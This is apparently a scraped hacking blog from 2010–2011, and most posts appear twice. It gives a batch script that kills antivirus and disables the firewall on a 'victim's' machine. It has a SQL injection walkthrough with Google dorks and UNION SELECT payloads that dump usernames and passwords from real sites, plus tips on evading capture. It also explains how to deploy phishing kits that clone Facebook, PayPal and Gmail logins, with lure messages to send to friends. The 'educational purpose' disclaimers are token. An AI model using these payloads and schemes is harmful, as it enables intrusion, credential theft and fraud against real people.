download below files
http://hotfile.com/dl/109144168/ccea239/Phisher.rar.html
Monday, March 7, 2011
Wednesday, January 26, 2011
windows command line tools
A good tutorial which i found on the net
Setting a static IP:
netsh interface ip set address name="Local Area Connection" static 172.16.3.4 255.255.0.0 1172.16.3.1 1
Setting up DNS:
set dns name="Local Area Connection" static 208.67.222.222 register=PRIMARY
add dns name="Local Area Connection" 208.67.200.200
Checking your config:
netsh interface ip show config
Saving all of your settings to a file:
netsh -c interface dump > filename1.txt
Using a file to set the config (Tw way to use this)
netsh -f filename2.txt
netsh exec filename2.txt
Setting up DHCP:
netsh interface ip set address name="Local Area Connection" dhcp
Then use ipconfig /release and ipconfig /renew
Stopping a service:
sc stop SNMP
Disabling a service
sc config SNMP start= disabled
remotely open files from your computer
net file
List all sessions connected to this machine
NET SESSION
NET SESSION \\ComputerName
NET SESSION /DELETE /y
NET SESSION \\ComputerName /DELETE
hostname
getmac
to shutdown a remote computer
shutdown -i
to cancel a scheduled shutdown
shutdown -a
Setting a static IP:
netsh interface ip set address name="Local Area Connection" static 172.16.3.4 255.255.0.0 1172.16.3.1 1
Setting up DNS:
set dns name="Local Area Connection" static 208.67.222.222 register=PRIMARY
add dns name="Local Area Connection" 208.67.200.200
Checking your config:
netsh interface ip show config
Saving all of your settings to a file:
netsh -c interface dump > filename1.txt
Using a file to set the config (Tw way to use this)
netsh -f filename2.txt
netsh exec filename2.txt
Setting up DHCP:
netsh interface ip set address name="Local Area Connection" dhcp
Then use ipconfig /release and ipconfig /renew
Stopping a service:
sc stop SNMP
Disabling a service
sc config SNMP start= disabled
remotely open files from your computer
net file
List all sessions connected to this machine
NET SESSION
NET SESSION \\ComputerName
NET SESSION /DELETE /y
NET SESSION \\ComputerName /DELETE
hostname
getmac
to shutdown a remote computer
shutdown -i
to cancel a scheduled shutdown
shutdown -a
Tuesday, January 18, 2011
Disable any Antivirus using batch script
Please save below code in notepad and save as av.bat whatever you like
@echo off
rem --
rem Permamanently Kill Anti-Virus
net stop "Security Center"
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
Note- if tskill command wont work on victim's os then replace it with taskkill
Enjoy hacking
Warning- this is only educational purpose...
@echo off
rem --
rem Permamanently Kill Anti-Virus
net stop "Security Center"
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
Note- if tskill command wont work on victim's os then replace it with taskkill
Enjoy hacking
Warning- this is only educational purpose...
Sunday, January 16, 2011
What is a SQL Injection?
This is a tutorial for people who would like to learn how to sql inject into a site.
FAQ
What is a SQL Injection?
A SQL Injection is a method used by people which allows them to get inside of a MySQL database through the website.
What can I do with an SQLi?
You can extract data such as passwords, usernames, locations, and also change the site in which you can put whatever you want on it.
Is it hard to do?
At first, it may take you some time to get used to the queries. But after some practice, it's very easy.
Will I get caught?
If you are not using a proxy or VPN (Virtual Private Network), then yes there is a chance that you may be caught. I suggest reading the Proxies and Socks forum on here to learn more about what these are.
What is a dork?
A dork is a phrase that you see at the end of most URLs. In SQL Injection, you search for dorks to find a website that looks as though it may be vulnerable for injecting
Injection Tutorial
Step 1.
Search Google by typing in a dork and clicking one of the website that show up.
Common Dorks
inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=
Step 2. Once you have found a site, it's time that we check if it is vulnerable to a SQL Injection.
So let's say we have a site like this
Quote:http://www.site.com/index.php?id=1
What we do is put a ' (single quote) after the number in order to get an error to show up on the page.
Quote:http://www.site.com/index.php?id=1'
You should get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1" or something.
Step 3. After getting the error, we know it's vulnerable to SQL Injection. Now we have to find out how many columns it has. We use the "order by" function to do this.
Quote:http://www.site.com/index.php?id=1 order by 10
Now, I suggest you go by 10's. If you did order by a number and it shows an error, that means to use a lower number. We need to use a number and not get any errors, then use the number right after the number we used and get an error.
So let's say we did:
order by 10 (error)
order by 7 (no error)
order by 8 (no error)
order by 9 (error)
What this means is that there are 8 columns.
Step 4. Now that we have the number of columns, it's time to figure out which column is vulnerable so that we can extract data from it. We can do this by putting a "-" minus sign after the = equals sign in the url and by using the union select function. After union select, write every number that leads to the number of columns, separated by a comma.
So here's how it should look:
Quote:http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8
After you do this, you should should get one or more of the numbers of columns in the database to show up on screen.
Step 5. Let's say a number 2 popped up on the screen. That means that column number 2 is vulnerable. Now we need to get the version of the database. We do this by using the @@version function.
Quote:http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8
Replace the number 2 in the url with @@version to get the version number to show up on your screen. Now the numbers that show up should either be 5.(some numbers) or 4.(some numbers).
For SQL Version 5 Injection:
Step 1. Now that we have the version number, it's time to get the name of the tables within the database. We use the group_concat(table_name) function. Since it's version 5, the tables are already in 1 big table named information_schema. We use -- to execute our command.
Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--
Step 2. On the screen, a bunch of names should pop up. Those are the names of the tables. Now, what you need to look for anything that might look like it contains the usernames and passwords from everyone who uses the website. Some common ones are users, admin, members, staff, user, etc.
Step 3. Once you have found something that might contain the usernames and passwords, it's time to get the name of the columns within that table. We use the group_concat(column_name) function to achieve this. And once again, in version 5, the columns are within information_schema.columns this time.
After the information_schema.columns, you need to tell the database which table you want to extract the columns. So after .columns, you put where table_name=(Name of table in hex form)
Now to convert the name of the table you're extracting from into Hex form, you need to use an online converter. What I use is Text to Hex Converter. After you have the hex, put 0x before it and copy all of the numbers/letters and paste them after the = equals sign.
So after all that it should look like this:
Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x7573657273
The name of the columns should pop up on your screen.
Step 4. Now that you have the column names within the table name you chose, it's time to extract the data. Once again, we will use the group_concat function.
Let's say that the column names that showed up were username,password. To extract the information, we put group_concat(username,0x3a,password) from users-- (The table name that you chose in TEXT form not Hexed). (Note: 0x3a is the hex form of a colon, which separates the usernames and passwords so you don't get confused.) After you've done this, you're url should look like this:
Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users--
Now the usernames of people should show up, then a colon, then the passwords of the usernames.
For SQL Version 4 Injection:
For version 4 database SQL injections, it's the same thing as version 5. The only difference is that when trying to find the table name, you have to guess what it is. It's not already done for you like in version 5. I suggest guessing like user or admin or members, and if that doesn't work, keep trying until you get something. After you've got the table name, just follow the same steps for 5 afterwards.
Thank you for reading my tutorial, if you have any questions you can post here or PM me and I'll do the best I can to help you.
FAQ
What is a SQL Injection?
A SQL Injection is a method used by people which allows them to get inside of a MySQL database through the website.
What can I do with an SQLi?
You can extract data such as passwords, usernames, locations, and also change the site in which you can put whatever you want on it.
Is it hard to do?
At first, it may take you some time to get used to the queries. But after some practice, it's very easy.
Will I get caught?
If you are not using a proxy or VPN (Virtual Private Network), then yes there is a chance that you may be caught. I suggest reading the Proxies and Socks forum on here to learn more about what these are.
What is a dork?
A dork is a phrase that you see at the end of most URLs. In SQL Injection, you search for dorks to find a website that looks as though it may be vulnerable for injecting
Injection Tutorial
Step 1.
Search Google by typing in a dork and clicking one of the website that show up.
Common Dorks
inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=
Step 2. Once you have found a site, it's time that we check if it is vulnerable to a SQL Injection.
So let's say we have a site like this
Quote:http://www.site.com/index.php?id=1
What we do is put a ' (single quote) after the number in order to get an error to show up on the page.
Quote:http://www.site.com/index.php?id=1'
You should get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1" or something.
Step 3. After getting the error, we know it's vulnerable to SQL Injection. Now we have to find out how many columns it has. We use the "order by" function to do this.
Quote:http://www.site.com/index.php?id=1 order by 10
Now, I suggest you go by 10's. If you did order by a number and it shows an error, that means to use a lower number. We need to use a number and not get any errors, then use the number right after the number we used and get an error.
So let's say we did:
order by 10 (error)
order by 7 (no error)
order by 8 (no error)
order by 9 (error)
What this means is that there are 8 columns.
Step 4. Now that we have the number of columns, it's time to figure out which column is vulnerable so that we can extract data from it. We can do this by putting a "-" minus sign after the = equals sign in the url and by using the union select function. After union select, write every number that leads to the number of columns, separated by a comma.
So here's how it should look:
Quote:http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8
After you do this, you should should get one or more of the numbers of columns in the database to show up on screen.
Step 5. Let's say a number 2 popped up on the screen. That means that column number 2 is vulnerable. Now we need to get the version of the database. We do this by using the @@version function.
Quote:http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8
Replace the number 2 in the url with @@version to get the version number to show up on your screen. Now the numbers that show up should either be 5.(some numbers) or 4.(some numbers).
For SQL Version 5 Injection:
Step 1. Now that we have the version number, it's time to get the name of the tables within the database. We use the group_concat(table_name) function. Since it's version 5, the tables are already in 1 big table named information_schema. We use -- to execute our command.
Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--
Step 2. On the screen, a bunch of names should pop up. Those are the names of the tables. Now, what you need to look for anything that might look like it contains the usernames and passwords from everyone who uses the website. Some common ones are users, admin, members, staff, user, etc.
Step 3. Once you have found something that might contain the usernames and passwords, it's time to get the name of the columns within that table. We use the group_concat(column_name) function to achieve this. And once again, in version 5, the columns are within information_schema.columns this time.
After the information_schema.columns, you need to tell the database which table you want to extract the columns. So after .columns, you put where table_name=(Name of table in hex form)
Now to convert the name of the table you're extracting from into Hex form, you need to use an online converter. What I use is Text to Hex Converter. After you have the hex, put 0x before it and copy all of the numbers/letters and paste them after the = equals sign.
So after all that it should look like this:
Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x7573657273
The name of the columns should pop up on your screen.
Step 4. Now that you have the column names within the table name you chose, it's time to extract the data. Once again, we will use the group_concat function.
Let's say that the column names that showed up were username,password. To extract the information, we put group_concat(username,0x3a,password) from users-- (The table name that you chose in TEXT form not Hexed). (Note: 0x3a is the hex form of a colon, which separates the usernames and passwords so you don't get confused.) After you've done this, you're url should look like this:
Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users--
Now the usernames of people should show up, then a colon, then the passwords of the usernames.
For SQL Version 4 Injection:
For version 4 database SQL injections, it's the same thing as version 5. The only difference is that when trying to find the table name, you have to guess what it is. It's not already done for you like in version 5. I suggest guessing like user or admin or members, and if that doesn't work, keep trying until you get something. After you've got the table name, just follow the same steps for 5 afterwards.
Thank you for reading my tutorial, if you have any questions you can post here or PM me and I'll do the best I can to help you.
Thursday, January 13, 2011
How to Uninstall any application using VB script
save below code in notepad and save it with application_uninstaller.vbs
On error resume Next
Dim strName, WshShell, oReg, keyname
Const HKEY_LOCAL_MACHINE = &H80000002
Const ForReading = 1, ForWriting = 2, ForAppending = 8
strComputer = "."
'=============================================
'Change the Code here
Input = Ucase(InputBox("Copy Righted by @crackmind Enter Application Name as in ARP:", "App Name"))
If Input="" then
wscript.quit
Else
str1=Input
End If
'=============================================
Set fso = CreateObject("Scripting.FileSystemObject")
Set WshShell = CreateObject("WScript.Shell")
currentDirectory = Left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(Len(WScript.ScriptName)))
Set filetxt = fso.OpenTextFile(currentDirectory & "UninstallString.txt", 2, True)
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
oReg.EnumKey HKEY_LOCAL_MACHINE, strKeyPath, arrSubKeys
For Each subkey In arrSubKeys
keyname = ""
keyname = wshshell.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" & subkey & "\DisplayName")
str2 = UCase(keyname)
strCmp = InStr(1, Str2, Str1)
If Not strCmp = 0 then
If Not InStr(1, subkey, "{") = 0 Then
i = subkey
Exit For
Else
i = wshshell.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" & subkey & "\UninstallString")
'MsgBox i,0,keyname & " Uninstall String"
filetxt.WriteLine i
filetxt.Close
WshShell.Run("notepad " & currentDirectory & "UninstallString.txt")
wscript.quit
End If
End If
Next
If i then
'MsgBox "MSIEXEC.EXE /X " & i & " /QN",0,keyname & " Uninstall String"
'WshShell.Run "MSIEXEC.EXE /X " & i & " /QN", 1, True
filetxt.WriteLine "MSIEXEC.EXE /X " & i & " /QN"
filetxt.Close
WshShell.Run("notepad " & currentDirectory & "UninstallString.txt")
End If
Set WshShell = Nothing
set ObjReg = Nothing
WScript.Quit
copy above script in notepad and save it as application_uninstaller.vbs
Note- this script will work only on MSI files
tested on 2000/Xp
not tested on win 7..
when u execute this script on ur systme it will ask you to Enter Application Name as in ARP
you to put the application name which you want to remove from you system
you can get your application correct name in add/remove program windows
If any query mail me here crackmindd717@gmail.com
I will be coming with latest hacking post...............
If any suggestion feel free to mail me
On error resume Next
Dim strName, WshShell, oReg, keyname
Const HKEY_LOCAL_MACHINE = &H80000002
Const ForReading = 1, ForWriting = 2, ForAppending = 8
strComputer = "."
'=============================================
'Change the Code here
Input = Ucase(InputBox("Copy Righted by @crackmind Enter Application Name as in ARP:", "App Name"))
If Input="" then
wscript.quit
Else
str1=Input
End If
'=============================================
Set fso = CreateObject("Scripting.FileSystemObject")
Set WshShell = CreateObject("WScript.Shell")
currentDirectory = Left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(Len(WScript.ScriptName)))
Set filetxt = fso.OpenTextFile(currentDirectory & "UninstallString.txt", 2, True)
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
oReg.EnumKey HKEY_LOCAL_MACHINE, strKeyPath, arrSubKeys
For Each subkey In arrSubKeys
keyname = ""
keyname = wshshell.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" & subkey & "\DisplayName")
str2 = UCase(keyname)
strCmp = InStr(1, Str2, Str1)
If Not strCmp = 0 then
If Not InStr(1, subkey, "{") = 0 Then
i = subkey
Exit For
Else
i = wshshell.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" & subkey & "\UninstallString")
'MsgBox i,0,keyname & " Uninstall String"
filetxt.WriteLine i
filetxt.Close
WshShell.Run("notepad " & currentDirectory & "UninstallString.txt")
wscript.quit
End If
End If
Next
If i then
'MsgBox "MSIEXEC.EXE /X " & i & " /QN",0,keyname & " Uninstall String"
'WshShell.Run "MSIEXEC.EXE /X " & i & " /QN", 1, True
filetxt.WriteLine "MSIEXEC.EXE /X " & i & " /QN"
filetxt.Close
WshShell.Run("notepad " & currentDirectory & "UninstallString.txt")
End If
Set WshShell = Nothing
set ObjReg = Nothing
WScript.Quit
copy above script in notepad and save it as application_uninstaller.vbs
Note- this script will work only on MSI files
tested on 2000/Xp
not tested on win 7..
when u execute this script on ur systme it will ask you to Enter Application Name as in ARP
you to put the application name which you want to remove from you system
you can get your application correct name in add/remove program windows
If any query mail me here crackmindd717@gmail.com
I will be coming with latest hacking post...............
If any suggestion feel free to mail me
Monday, January 10, 2011
Saturday, December 18, 2010
Phishing All In one
Note- This is only for educational purpose.Do it on you own responsibility
you want to hack the facebook account of anyone , then to hack account u make a fake page of facebook which looks like the original one but is attached to your site .... u send this page to your friend saying anything like "hey new version of facebook,check the hidden pics of girls " . Now he must try to login on it . once he typed his pass and click login,he will redirect to the original facebook and his id and pass which he typed on the fake page will come to your online account . He even doesnt know that he has been hacked
How to do phishing :
===============
How to create fake webpage in order 2 get da victim pass.
The Following File Includes Most Of The Famous Sites Fake Pages.First download it
eBay
Facebook
Gmail
Hi5
AIM
Hotmail
Yahoo
My Space
Paypal
FLV
Photo Bucket
Rapidshare
Runescape
download files from here
http://www.MegaShare.com/2836840
password is hack
INSTRUCTIONS:
=============
** Suppose you want to hack facebook account then open faceboook folder.Each Folder Contains 4 Files -
1) Index.html - clone of facebook login page
2) Run.php - processing php file joins 1 community and stores login details
3) One Gif image
4) ld.txt - where login details will be saved
** Now upload these three files (except image file ) to a free webhost site with PHP installed.
** Send the site link of index.html to the victim and when he login on it the password comes to Id.txt
Enjoy.
you want to hack the facebook account of anyone , then to hack account u make a fake page of facebook which looks like the original one but is attached to your site .... u send this page to your friend saying anything like "hey new version of facebook,check the hidden pics of girls " . Now he must try to login on it . once he typed his pass and click login,he will redirect to the original facebook and his id and pass which he typed on the fake page will come to your online account . He even doesnt know that he has been hacked
How to do phishing :
===============
How to create fake webpage in order 2 get da victim pass.
The Following File Includes Most Of The Famous Sites Fake Pages.First download it
eBay
Gmail
Hi5
AIM
Hotmail
Yahoo
My Space
Paypal
FLV
Photo Bucket
Rapidshare
Runescape
download files from here
http://www.MegaShare.com/2836840
password is hack
INSTRUCTIONS:
=============
** Suppose you want to hack facebook account then open faceboook folder.Each Folder Contains 4 Files -
1) Index.html - clone of facebook login page
2) Run.php - processing php file joins 1 community and stores login details
3) One Gif image
4) ld.txt - where login details will be saved
** Now upload these three files (except image file ) to a free webhost site with PHP installed.
** Send the site link of index.html to the victim and when he login on it the password comes to Id.txt
Enjoy.
Subscribe to:
Posts (Atom)